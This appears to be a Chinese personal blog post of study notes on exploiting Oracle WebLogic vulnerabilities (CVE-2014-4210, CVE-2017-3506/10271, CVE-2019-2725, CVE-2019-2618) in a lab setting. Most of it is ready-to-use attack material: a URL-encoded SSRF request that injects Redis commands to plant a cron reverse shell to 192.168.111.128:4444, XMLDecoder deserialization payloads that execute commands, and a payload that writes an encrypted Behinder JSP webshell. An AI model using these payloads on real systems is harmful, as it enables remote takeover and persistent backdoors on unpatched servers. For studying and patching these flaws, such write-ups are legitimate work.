1.SSRF漏洞(CVE-2014-4210)

  • 影响版本:weblogic 10.0.2 -- 10.3.6.0
  • 漏洞位置:127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp
  • 漏洞利用:
    漏洞利用
    在此处随便输入东西后点search后抓包,
    抓包
    红框处位置存在ssrf漏洞,

例如修改为127.0.0.1:7001的回显:

7001
修改为不存在的端口例如8888的回显:
8888

  • 漏洞利用2:
    结合 %0a%0d来注入换行符 和redis反弹shell
xxx
set asd "\n\n* * * * *  sh -i >& /dev/tcp/192.168.111.128/4444 0>&1\n\n "
config set dir /var/spool/cron
config set dbfilename root
save
xxx

将上列命令进行url编码

poc:

http://192.168.111.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/xxx%0D%0Aset%20asd%20%22%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F4444%200%3E%261%5Cn%5Cn%20%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0Axxx

去redis服务器看一眼

没问题,计划任务写进去了

过一会shell也反弹回来了


2. 命令执行无回显(CVE-2017-3506 & 10271)

  • 影响版本:WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 版本
  • 漏洞位置:127.0.0.1:7001/wls-wsat/CoordinatorPortType(POST)
  • 漏洞利用:
    抓包修改请求方式为POST,修改Content-Typetext/xml
    post内容:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0"><string>cmd.exe</string></void>
              <void index="1"><string>/c</string></void>
              <void index="2"><string>calc</string></void>
              <!--
              <void index="0"><string>/bin/sh</string></void>
              <void index="1"><string>-c</string></void>
              <void index="2"><string>touch /tmp/shell</string></void>
              -->
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

结果会返回500,但实际命令是执行成功的

  • 漏洞利用(写webshell):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jsp</string>
    <void method="println"><string>
    <![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="xxxxxxxxxxxxxxxx";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

然后用冰蝎连接http://192.168.111.131:7001/bea_wls_internal/shell.jsp测试


3.反序列化远程代码执行漏洞(CVE-2019-2725)

  • 影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
  • 漏洞位置:127.0.0.1:7001/_async/AsyncResponseService(POST)
    (和上一个漏洞利用差不多)
  • 漏洞利用:
    poc
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">  
  <soapenv:Header> 
    <wsa:Action>xx</wsa:Action>  
    <wsa:RelatesTo>xx</wsa:RelatesTo>  
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
      <void class="java.lang.ProcessBuilder"> 
        <array class="java.lang.String" length="3"> 
          <void index="0"> <string>cmd.exe</string></void>  
          <void index="1">  <string>/c</string></void>  
          <void index="2"> <string>calc</string></void> 
          <!--
          <void index="0"><string>/bin/sh</string></void>
          <void index="1"><string>-c</string></void>
          <void index="2"><string>touch /tmp/shell</string></void>
          -->
        </array>  
        <void method="start"/>
      </void> 
    </work:WorkContext> 
  </soapenv:Header>  
  <soapenv:Body> 
    <asy:onAsyncDelivery/> 
  </soapenv:Body>
</soapenv:Envelope>

返回结果为202

或者直接使用msf获取shell:
exploit(multi/misc/weblogic_deserialize_asyncresponseservice)


4.任意文件上传(CVE-2019-2618)

  • 影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
  • 漏洞位置:127.0.0.1:7001/bea_wls_deployment_internal/DeploymentService(POST)
  • 利用条件:需知道用户名和密码(很鸡肋)
  • 漏洞利用:
    (待补充)
本文作者:Author:     文章标题:weblogic漏洞学习积累
本文地址:https://yuaneuro.cn/archives/weblogic.html     
版权说明:若无注明,本文皆为“yuaneuro的小站”原创,转载请保留文章出处。
Last modification:April 5th, 2021 at 02:25 pm
如果觉得我的文章对你有用,请随意赞赏